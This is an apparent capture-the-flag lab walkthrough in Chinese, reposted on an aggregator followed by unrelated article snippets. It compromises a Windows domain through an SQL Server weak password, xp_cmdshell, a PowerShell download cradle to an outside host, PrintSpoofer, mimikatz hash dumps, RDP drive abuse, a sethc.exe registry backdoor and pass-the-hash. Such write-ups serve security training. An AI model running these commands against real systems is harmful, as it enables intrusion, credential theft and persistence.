i春秋云镜之Tsclient

首先拿到目标:39.99.137.155

首先通过Fscan扫描目标:
在这里插入图片描述
可以看到扫描出来了一个SqlServer的弱口令。

账号是sa,密码是1qaz!QAZ。

这里就不使用navicat进行连接了,这里使用impacket-mssqlclient进行连接。

impacket-mssqlclient sa:'1qaz!QAZ'@39.99.137.155 -port 1433

在这里插入图片描述
首先开启xpcmdshell:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

然后使用xpcmdshell执行命令。

exec xp_cmdshell 'dir c:\'

在这里插入图片描述
我们发现是权限是mssql权限,所以我们需要提权。

这里直接弹到cs上面:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://43.137.19.241:80/a'))"

在这里插入图片描述
但是需要注意的是会有标点符号的错误。

所以我们需要进行编码一下: https://r0yanx.com/tools/java_exec_encode/
在这里插入图片描述
拿到编码结果之后,然后运行。
在这里插入图片描述
可以看到已经上线了。
在这里插入图片描述
首先上传fscan。
在这里插入图片描述
然后使用fscan进行扫描内网。

fscan64.exe -h 172.22.8.0/24
172.22.8.15 DC
172.22.8.46 WIN2016.xiaorang.lab

在这里插入图片描述
我们可以发现这里面都是windows的机器,我们先提权。

这里使用PrintSpoofer64进行提权,可以发现已经提权成功了。
在这里插入图片描述
这里进行反弹shell。

这里使用之前的进行反弹shell。
在这里插入图片描述
然后通过mimikatz将密码或Hash。

beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82549 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027:::[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 787066 bytes
[+] received output:Authentication Id : 0 ; 597160 (00000000:00091ca8)
Session           : RemoteInteractive from 2
User Name         : John
Domain            : WIN-WEB
Logon Server      : WIN-WEB
Logon Time        : 2023/9/10 12:58:55
SID               : S-1-5-21-4088072006-1921831747-1237773115-1008msv :	[00000003] Primary* Username : John* Domain   : WIN-WEB* NTLM     : eec9381b043f098b011be51622282027* SHA1     : 18056c7dda082b2b219dbaac6157a1fb234403bctspkg :	wdigest :	* Username : John* Domain   : WIN-WEB* Password : (null)kerberos :	* Username : John* Domain   : WIN-WEB* Password : (null)ssp :	credman :	Authentication Id : 0 ; 570164 (00000000:0008b334)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/9/10 12:58:54
SID               : S-1-5-90-0-2msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	ssp :	credman :	Authentication Id : 0 ; 569758 (00000000:0008b19e)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/9/10 12:58:54
SID               : S-1-5-90-0-2msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	ssp :	credman :	Authentication Id : 0 ; 213937 (00000000:000343b1)
Session           : Service from 0
User Name         : MSSQLFDLauncher
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:27
SID               : S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	ssp :	credman :	Authentication Id : 0 ; 105373 (00000000:00019b9d)
Session           : Service from 0
User Name         : MSSQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:16
SID               : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	* Username : MSSQLSERVER* Domain   : NT Service* Password : (null)ssp :	credman :	Authentication Id : 0 ; 105176 (00000000:00019ad8)
Session           : Service from 0
User Name         : SSASTELEMETRY
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:16
SID               : S-1-5-80-1549978933-2891762758-2075524219-3728768389-1145206490msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	* Username : SSASTELEMETRY* Domain   : NT Service* Password : (null)ssp :	credman :	Authentication Id : 0 ; 61591 (00000000:0000f097)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:14
SID               : S-1-5-90-0-1msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	ssp :	credman :	Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-WEB$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:14
SID               : S-1-5-20msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	* Username : win-web$* Domain   : WORKGROUP* Password : (null)ssp :	credman :	Authentication Id : 0 ; 21788 (00000000:0000551c)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:04
SID               : msv :	tspkg :	wdigest :	kerberos :	ssp :	credman :	Authentication Id : 0 ; 597129 (00000000:00091c89)
Session           : RemoteInteractive from 2
User Name         : John
Domain            : WIN-WEB
Logon Server      : WIN-WEB
Logon Time        : 2023/9/10 12:58:55
SID               : S-1-5-21-4088072006-1921831747-1237773115-1008msv :	[00000003] Primary* Username : John* Domain   : WIN-WEB* NTLM     : eec9381b043f098b011be51622282027* SHA1     : 18056c7dda082b2b219dbaac6157a1fb234403bctspkg :	wdigest :	* Username : John* Domain   : WIN-WEB* Password : (null)kerberos :	* Username : John* Domain   : WIN-WEB* Password : (null)ssp :	credman :	Authentication Id : 0 ; 320509 (00000000:0004e3fd)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:47
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	ssp :	credman :	Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:17
SID               : S-1-5-17msv :	tspkg :	wdigest :	* Username : (null)* Domain   : (null)* Password : (null)kerberos :	ssp :	credman :	Authentication Id : 0 ; 106406 (00000000:00019fa6)
Session           : Service from 0
User Name         : SSISTELEMETRY130
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:16
SID               : S-1-5-80-1625532266-625503396-2441596095-4129757946-3375356652msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	ssp :	credman :	Authentication Id : 0 ; 106366 (00000000:00019f7e)
Session           : Service from 0
User Name         : SQLTELEMETRY
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:16
SID               : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	* Username : SQLTELEMETRY* Domain   : NT Service* Password : (null)ssp :	credman :	Authentication Id : 0 ; 105681 (00000000:00019cd1)
Session           : Service from 0
User Name         : MsDtsServer130
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:16
SID               : S-1-5-80-3763098489-2620711134-3767674660-4164406483-1621732msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	ssp :	credman :	Authentication Id : 0 ; 105599 (00000000:00019c7f)
Session           : Service from 0
User Name         : ReportServer
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:16
SID               : S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	* Username : ReportServer* Domain   : NT Service* Password : (null)ssp :	credman :	Authentication Id : 0 ; 105473 (00000000:00019c01)
Session           : Service from 0
User Name         : MSSQLServerOLAPService
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:16
SID               : S-1-5-80-2872255330-672591203-888807865-2791174282-1554802921msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	* Username : MSSQLServerOLAPService* Domain   : NT Service* Password : (null)ssp :	credman :	Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:14
SID               : S-1-5-19msv :	tspkg :	wdigest :	* Username : (null)* Domain   : (null)* Password : (null)kerberos :	* Username : (null)* Domain   : (null)* Password : (null)ssp :	credman :	Authentication Id : 0 ; 61626 (00000000:0000f0ba)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:14
SID               : S-1-5-90-0-1msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	ssp :	credman :	Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-WEB$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2023/9/10 12:57:04
SID               : S-1-5-18msv :	tspkg :	wdigest :	* Username : WIN-WEB$* Domain   : WORKGROUP* Password : (null)kerberos :	* Username : win-web$* Domain   : WORKGROUP* Password : (null)ssp :	credman :	

可以看到我们得到了John用户的Hash。

我们在查看query user的时候发现有一个用户产生的会话。
在这里插入图片描述
我们查看一下3389端口。
在这里插入图片描述
可以看到有内网的其他主机连接了我们的3389端口。

这里可能存在一个RDP反打, 参考文章:https://mp.weixin.qq.com/s/0dY0Gj2HxYw_EYhxixKzvQ

因为它在远程连接我们的时候把磁盘也挂载过来了,这里由于我们不能让对面那台主机重启所以我们不能通过写启动项的方式让他上线但我们在对方的C盘发现了一个用户以及提示的信息接下来就是进一步的操作这里先把权限切换到John用户。

我们可以查看共享文件。

net use

在这里插入图片描述
可以看到John是在远程组中的。
在这里插入图片描述
这里很明显要我们用这个因为又是远程组又是管理员组远程桌面挂载的磁盘是在\\tsclient\这个下面在查看之前我们还需要把权限切换为John因为对方远程登录的是这个桌面这里切忌一定不要远程上去你一旦远程上去 对方的连接就会断开 他的C盘也会断开所以你收集不到他的磁盘信息了迁移到John的进程上去ps查看以后迁移获得一个john用户的会话

迁移完进程之后w查看\tsclient\目录可以发现有一个credential.txt文件。
在这里插入图片描述
我们查看这个文件。可以发现它是一个域用户和密码。
在这里插入图片描述
里我们直接搭建一个socks4代理,然后rdp上去8.46这台主机。

但是用windows mstsc去登录的时候提示密码过期了,这里我们需要去使用rdesktop去登录。

proxychains rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Ald@rLMWuy7Z!#'

在这里插入图片描述
这里同样我们也可以使用smbpasswd来进行密码修改。

proxychains python3 smbpasswd.py xiaorang.lab/Aldrich:'Admin123..'@172.22.8.15 -newpass qwer1234!

修改完密码之后,我们查看下这个账户都有那些主机可以登录。

查看注册表权限,发现所有用户都对HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options创建和写入。
在这里插入图片描述
写入后门:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

在这里插入图片描述
连续按5下shift。
在这里插入图片描述
然后我们通过bloodhound.py进行域内信息收集。

proxychains python3 bloodhound.py -d xiaorang.lab -u Aldrich -p Admin123.. -gc DC01.xiaorang.lab -c all --dns-tcp -ns 172.22.8.15

在这里插入图片描述
在这里插入图片描述
然后我们上传mimikatz到WIN2016里面。

然后将密码导出:
在这里插入图片描述

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ##       > https://blog.gentilkiwi.com/mimikatz'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )'#####'        > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # privilege::debug
Privilege '20' OKmimikatz(commandline) # sekurlsa::logonpasswordsAuthentication Id : 0 ; 19739416 (00000000:012d3318)
Session           : RemoteInteractive from 2
User Name         : Aldrich
Domain            : XIAORANG
Logon Server      : DC01
Logon Time        : 2023/9/10 15:08:53
SID               : S-1-5-21-3289074908-3315245560-3429321632-1105msv :	[00000003] Primary* Username : Aldrich* Domain   : XIAORANG* NTLM     : 283b022e27f25cd57ad5ebe1f468c04b* SHA1     : b945edab59edbfa67346679a86d181e100f0a13c* DPAPI    : db2e5b84ea0691c3ae7d57ae29af84cftspkg :	wdigest :	* Username : Aldrich* Domain   : XIAORANG* Password : (null)kerberos :	* Username : Aldrich* Domain   : XIAORANG.LAB* Password : (null)ssp :	credman :	Authentication Id : 0 ; 19507835 (00000000:0129aa7b)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/9/10 15:06:13
SID               : S-1-5-90-0-2msv :	[00000003] Primary* Username : WIN2016$* Domain   : XIAORANG* NTLM     : 4d52b3ef6bfb5be6c4223d9ec4dff5f2* SHA1     : ba772a78c405b8de1452352b9c6c8752581b203atspkg :	wdigest :	* Username : WIN2016$* Domain   : XIAORANG* Password : (null)kerberos :	* Username : WIN2016$* Domain   : xiaorang.lab* Password : 30 f1 3f 6f ad 57 45 34 07 55 41 35 61 82 7b 15 99 06 5d 56 2b 37 4b 2b 5d a8 b8 a2 97 0a 63 3a 44 52 88 bc de a1 14 35 1c 6e 0d 29 88 28 72 cf 31 f4 52 34 af 35 93 50 c7 42 6b 

紧接着我们就可以直接hash传递了。
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/226163.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

yolov5单目测距+速度测量+目标跟踪

要在YOLOv5中添加测距和测速功能,您需要了解以下两个部分的原理: 单目测距算法 单目测距是使用单个摄像头来估计场景中物体的距离。常见的单目测距算法包括基于视差的方法(如立体匹配)和基于深度学习的方法(如神经网…

数据结构之---- 分治算法

数据结构之---- 分治算法 什么是分治算法? 分治,全称分而治之,是一种非常重要且常见的算法策略。 分治通常基于递归实现,包括 分 和 治 两个步骤: 分(划分阶段):递归地将原问题分…

冰镇的红酒有什么特色呢?

冰镇红酒远不是一个新现象,大多数葡萄酒饮用者仍然坚持白葡萄酒应该冰镇后饮用,而红葡萄酒应该在室温下饮用这种过时的信念。在几十年或几个世纪的时间里,当“室温”更接近于地窖温度时,这种说法可能是正确的,但在当代…

01-C++基础

c概述 1. 概述 1.1 简介 “c” 中的 来自于 c 语言中的递增运算符,该运算符将变量加 1。 c起初也叫”c with class”。通过名称表明, c是对 c 的扩展,因此 c是 c 语言的超集,这意味着 任何有效的 c 程序都是有效的 c程序。 c程…

《PySpark大数据分析实战》-11.Spark on YARN模式安装Hadoop

📋 博主简介 💖 作者简介:大家好,我是wux_labs。😜 热衷于各种主流技术,热爱数据科学、机器学习、云计算、人工智能。 通过了TiDB数据库专员(PCTA)、TiDB数据库专家(PCTP…

我的隐私计算学习——匿踪查询

笔记内容来自多本书籍、学术资料、白皮书及ChatGPT等工具,经由自己阅读后整理而成。 (一)PIR的介绍 ​ 匿踪查询,即隐私信息检索(Private InformationRetrieval,PIR),是安全多方计算…

2012-12-12 下载ndk编译出so和可执行文件,放到android 真机运行,包含源码。

一、下载ndk链接NDK 下载 | Android NDK | Android Developers 二、解压ndk后得到下面的文件,里面包含ndk-build.cmd,这个是用来编译的。 三、Android.mk和C源码。完整源码下载路径https://download.csdn.net/download/qq_37858386/88622702 3.1 A…

k8s如何部署seata(分布式事务)?(第一篇)

k8s如何部署seata(分布式事务)? 官方传送门https://seata.io/zh-cn/ 快速入门SEATA Seata 是一款开源的分布式事务解决方案,致力于提供高性能和简单易用的分布式事务服务。Seata 将为用户提供了 AT、TCC、SAGA 和 XA 事务模式,为用户打造一站…

《Linux C编程实战》笔记:实现自己的ls命令

关键函数的功能及说明 1.void display_attribute(struct stat buf,char *name) 函数功能:打印文件名为name的文件信息,如 含义分别为:文件的类型和访问权限,文件的链接数,文件的所有者,文件所有者所属的组…

后端项目全局异常处理-使用RuntimeException自定义异常异常分类简单举例

接上篇:后端项目操作数据库-中枢组件Service调用Mapper 自定义异常: 手动抛出异常,为了后续统一捕获,需要异常自定义; 如:当使用抛出异常的方式表示“操作失败”时,为了后续统一捕获&#xff0c…

灯具照明行业MES/开源mes/灯具行业免费MES

一、万界星空科技开源MES系统概述: 万界星空科技免费MES、开源MES、商业开源MES、市面上最好的开源MES、MES源代码、适合二开的开源MES。 1.万界星空开源MES制造执行系统的Java开源版本。 开源mes系统包括系统管理,车间基础数据管理,计划管…

Chapter 7 - 3. Congestion Management in Ethernet Storage Networks以太网存储网络的拥塞管理

Pause Threshold for Long Distance Links长途链路的暂停阈值 This section uses the following basic concepts: 本节使用以下基本概念: Bit Time (BT): It is the time taken to transmit one bit. It is the reciprocal of the bit rate. For example, BT of a 10 GbE po…

喝葡萄酒时观酒闻香尝味究竟有什么用?

对许多人来说,在品尝葡萄酒时能发现大多数人闻不到的香气和尝不到的味道似乎是一种神奇的能力。其他人则认为这是学究式葡萄酒爱好者过于活跃的想象,或者是保持葡萄酒鉴赏精英声誉的一种方式,但两者都不是。 部分是艺术,部分是科…

目前最火的大模型训练框架 DeepSpeed 详解来了

目前,大模型的发展已经非常火热,关于大模型的训练、微调也是各个公司重点关注方向,但是大模型训练的痛点是模型参数过大,动辄上百亿,如果单靠单个GPU来完成训练基本不可能。所以需要多卡或者分布式训练来完成这项工作。…

MBA-数学题概念和公式

{}公差大于零的等差数列:多个数字组成的数列,两两之间差相等,且后值减前值大于0,如:{-2,0,2,4}为公差数列为2的等差数列.因数是指整数a除以整数b(b≠0) 的商正好是整数而没有余数,10的因数为 2和5圆柱体表面积 2πr 2πrh球体表名…

生产环境_Apache Spark技术大牛的实践:使用DataFrame API计算唯一值数量并展示技术(属性报告)

业务背景 给前端提供算法集成好的数据,对算法处理后的数据进行进一步删选展示 可以使用下面代码运行一下看看结果,听有趣的,我写的代码中计算了不同字段的值的数量,并生成了一个显示字符串来描述这些数据的分布情况然后使用"…

MySQL数据库 DDL

目录 一、DDL 二、操作数据库 三、操作表 四、数据类型 五、表操作案例 六、修改表 七、删除表 一、DDL Data Definition Language,数据定义语言,用来定义数据库对象(数据库,表,字段) 。 二、操作数据库 (1&am…

Git 使用教程(超级详细)

目录 一:Git二:SVN与Git的的区别三、安装Git四:常规操作五:远程仓库六:创建与合并分支七:bug分支八:多人协作九:git可视化工具 Git Git 是一种分布式版本控制系统,用于…

C# WPF上位机开发(加密和解密)

【 声明:版权所有,欢迎转载,请勿用于商业用途。 联系信箱:feixiaoxing 163.com】 在报文传输的过程中,根据报文传输的形态,有两种形式,一种是明文传输,一种是加密传输。当然明文传输…

Python+Requests+Pytest+YAML+Allure实现接口自动化

本项目实现接口自动化的技术选型:PythonRequestsPytestYAMLAllure ,主要是针对之前开发的一个接口项目来进行学习,通过 PythonRequests 来发送和处理HTTP协议的请求接口,使用 Pytest 作为测试执行器,使用 YAML 来管理测…